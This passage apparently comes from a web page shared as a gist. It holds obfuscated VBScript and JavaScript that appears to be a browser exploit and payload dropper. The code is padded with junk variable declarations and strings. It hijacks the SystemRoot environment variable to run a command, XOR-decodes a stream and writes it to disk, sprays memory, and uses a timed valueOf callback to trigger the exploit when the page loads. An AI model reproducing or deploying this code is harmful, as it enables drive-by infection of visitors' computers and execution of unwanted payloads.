fullCmdRun = cmdRun & fullPath
Dim g4NFhQIkS205
oldroot=w.Environment("Process").Item("SystemRoot")
Dim y7xxpZoTNLuR206
w.Environment("Process").Item("SystemRoot")=tmp
f8TbspmhLQ = "While Not Z0Jqto.b8VDvBhh Set p0Ntgxy = Nothing Function b6rtM(R7RFSM, X6ZuF "
w.Environment("Process").Item("SysFilename")= fullCmdRun
Dim u1VwJeasXFe208
Set sh = CreateObject("Shell.Application")
X2HiffzT = "Set Z3UtID = Nothing "
Dim K4UQBfoo210
End If
Dim q0PbnvgK211
End Sub
Dim G1ScbQLXUmz212
Dim c5LHzbUntVeb213
z2vqgCEBfCZq = "Set k7KrhBC = New P9dJvv Function X0Syz(P8OibTE, d7Tqi "
Dim z2saDyVxren215
Sub arcnsave(stream,strKey,fname)
Dim Q1iLdPOvRz216
Dim r8xlOghklTdz217
slen= stream.Size
Dim h7gimOZcQE218
stream.position=0
Dim z5aFKTwUauG219
redim rc(slen)
a4xSZsrrN = "Set s9oqxT = Nothing Function W5EgtTtH(n8SeCJNL, Q1inT Function b8Jxuo(u9WJKM, x2imtm "
strKey = CLng(strKey)
Dim A8BELMbduCpy221
For i=0 To slen-1
Dim w9SVKBytp222
strKey = (strKey + &haa) AND &hff
Dim y8XiUlrBPn223
strKey = strKey xor &h48
Dim k6VLPynld224
rc(i)= Chr(CByte(AscB(stream.Read(1)) xor strKey))
Dim q4yTSLnfyM225
Next
Dim p5hNDmQQITt226
Dim rctxt: rctxt = join(rc,"")
Dim r8mJNKUi227
Set c=CreateObject("Scripting.FileSystemObject")
Dim s0QxGxQnXS228
Set b=c.CreateTextFile(fname)
v0IBPzslILe = "Set Q8sxUHsJ = New F8KeiQzq "
b.Write rctxt
Dim y7TADRNDpv230
b.Close
Dim h6Xladtuy231
End Sub
Dim h9UEAnvJ232
Dim V9MouXUaXq233
s9CVHenq = "Private Sub Class u5UCxvc "
Dim K9hgnUTsPxBQ235
Function SmuggleFag
Dim E2mayxtzRy236
aw.ZeroineL()
d8uDWrdZCidI = "End Function Set S9OmLT = Nothing "
Dim i
J8urtBZpHTd = " f7ESGC = q9DvX & Trim(u5TrgzIJ.a3GzV()) End Sub End Function "
For i = 0 To k3
Dim d5atLiqyt239
y(i) = Mid(x, 1, k2*12)
Dim q7qMFxXTKURD240
Next
Dim E9xBecCRJTev241
End Function
</script>
<script type="text/javascript">
function strToInt(s)
{
return s.charCodeAt(0) | (s.charCodeAt(1) << 16);
}
function intToStr(x)
{
return String.fromCharCode(x & 0xffff) + String.fromCharCode(x >> 16);
}
var o;
o = {"valueOf": function () {
SmuggleFag();
return 1;
}};
setTimeout(function() {ProtectMe(o);}, 200);
</script>
</body>
</html></body>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment